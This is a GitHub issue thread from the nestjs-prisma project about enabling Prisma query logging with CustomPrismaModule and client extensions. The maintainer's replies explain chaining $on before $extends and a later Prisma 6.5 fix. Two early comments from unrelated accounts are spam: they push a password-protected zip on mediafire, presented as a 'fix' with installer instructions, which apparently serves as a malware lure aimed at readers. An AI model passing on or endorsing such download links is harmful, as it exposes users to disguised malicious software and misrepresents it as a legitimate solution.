### ISSUE TITLE
How do I enable logging with CustomPrismaModule?

### ISSUE THREAD

**Issue by cjmyles** [notiz-dev/nestjs-prisma#102]
I am utilising the `CustomPrismaModule` in order to make use of client extensions. I have a file `prisma.extension.ts` that has the following code:

```
export const extendedPrismaClient = new PrismaClient<
  Prisma.PrismaClientOptions,
  'query' | 'info' | 'warn' | 'error'
>({
  log: [
    { level: 'query', emit: 'event' },
    { level: 'info', emit: 'event' },
    { level: 'warn', emit: 'event' },
    { level: 'error', emit: 'event' },
  ],
}).$extends({
  model: {
     ...
  },
});

export type ExtendedPrismaClient = typeof extendedPrismaClient;
```

This is then instantiated in my `app.module.ts` file:

```
imports: [
    CustomPrismaModule.forRootAsync({
      name: 'PrismaService',
      isGlobal: true,
      useFactory: () => {
        return extendedPrismaClient;
      },
    }),
```

According to the [docs](https://nestjs-prisma.dev/docs/prisma-logging/) I need to add the following to my `main.ts` file:

```
async function bootstrap() {
  const app = await NestFactory.create(AppModule);

  // log query events
  const prismaService: PrismaService = app.get(PrismaService);
  prismaService.$on('query', (event) => {
    console.log(event);
  });
```

However, this results in the following error:

```
Nest could not find PrismaService element (this provider does not exist in the current context)
```

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by marcjulian** [comment]
Hi @cjmyles, you have full control over your PrismaClient instance with the extension. You should be able to add `$on` to your `new PrismaClient()` before calling `$extends()`. There was, not sure if still is, a problem with `$on` that it returns void so that `$extends()` cant be called.

```ts
export const extendedPrismaClient = new PrismaClient<
  Prisma.PrismaClientOptions,
  'query' | 'info' | 'warn' | 'error'
>({
  log: [
    { level: 'query', emit: 'event' },
    { level: 'info', emit: 'event' },
    { level: 'warn', emit: 'event' },
    { level: 'error', emit: 'event' },
  ],
})
.$on(...) // should go in here
.$extends({
  model: {
     ...
  },
});

export type ExtendedPrismaClient = typeof extendedPrismaClient;
```

**Comment by marcjulian** [comment]
I might have to update the docs to explain a bit more the differences between `PrismaService` and `CustomPrismaService`.

Because you use `CustomPrismaModule` in your `app.module.ts` imports you can only access `CustomPrismaService` with your extended PrismaClient.

The `PrismaService` only has access to the default `PrismaClient` at the default generated location. 

```ts
async function bootstrap() {
  const app = await NestFactory.create(AppModule);

  // log query events
  const prismaService: PrismaService = app.get(PrismaService); // ❌ this won't work because PrismaSerivce is not provided, only CustomPrismaService. But `$on` is not a function for `CustomPrismaService` because you have full control of your PrismaClient instance
  prismaService.$on('query', (event) => {
    console.log(event);
  });
```

If you have any questions, please let me know.

**Comment by cjmyles** [comment]
@marcjulian Thanks for the responses. I'm with you now. Until the bug is fixed regarding `$on()` returning void, it looks like I can't use both logging and client functions then. I can see the `FIXME` comment in the [prisma extension example](https://github.com/notiz-dev/nestjs-prisma/blob/c17a1d30dc07b05cbe3e5df2709082d74357a29a/examples/extensions/src/prisma.extension.ts#L17) but I can't find an issue in the [issues list](https://github.com/notiz-dev/nestjs-prisma/issues). Is this something we need to create?

**Comment by marcjulian** [comment]
@cjmyles yes would be good to create a Issue for `$on()` returning void in the [prisma repo](https://github.com/prisma/prisma)

**Comment by cjmyles** [comment]
@marcjulian Done. See https://github.com/prisma/prisma/issues/25153

**Comment by marcjulian** [comment]
This seems to be fixed with [Prisma 6.5](https://github.com/prisma/prisma/releases/tag/6.5.0)

> Allow for chaining $on and $extends.
In previous versions of Prisma ORM, the return type of the $on client method was void. This did not allow for chaining $on() and $extends() calls, as $on is not available on extended clients.
In this version we've resolved this issue and $on will now return the modified Prisma Client.
